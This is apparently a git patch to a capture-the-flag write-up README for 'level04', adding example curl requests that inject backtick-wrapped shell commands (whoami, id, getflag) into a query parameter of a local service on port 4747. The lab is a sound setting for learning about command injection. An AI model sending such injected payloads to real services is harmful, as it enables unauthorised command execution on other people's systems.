From c6a6c796cb428c4a99602374dc4f9aad9a41eb61 Mon Sep 17 00:00:00 2001
From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com>
Date: Sun, 17 Nov 2024 21:09:17 +0100
Subject: [PATCH] Update and rename README.mdx to README.md

---
 level04/{README.mdx => README.md} | 15 ++++++++++++++-
 1 file changed, 14 insertions(+), 1 deletion(-)
 rename level04/{README.mdx => README.md} (71%)

diff --git a/level04/README.mdx b/level04/README.md
similarity index 71%
rename from level04/README.mdx
rename to level04/README.md
index e2acc50..05e11dd 100644
--- a/level04/README.mdx
+++ b/level04/README.md
@@ -42,5 +42,18 @@ Solution
         z: scan if a port is open (a listening daemon)
 Connection to localhost 4747 port [tcp/*] succeeded!
 
-> curl localhost:4747/?x="\`/bin/getflag\`"
+# eg.
+> curl localhost:4747/?x="\`/usr/bin/whoami\`" 
+> curl localhost:4747/?x="\`/usr/bin/id\`" 
+> curl localhost:4747/?x="\`/bin/hostname\`" 
+> curl localhost:4747/?x="\`/bin/pwd\`" 
+> curl localhost:4747/?x="\`/bin/df\`" 
+
+# avoid typing realpath out
+> curl localhost:4747/?x="\`$(which pwd)\`" 🟢 
+or
+> curl localhost:4747/?x="\`$(whereis pwd|awk '{print $2}')\`"
+
+# solve
+> curl localhost:4747/?x="\`$(which getflag)\`"
 ```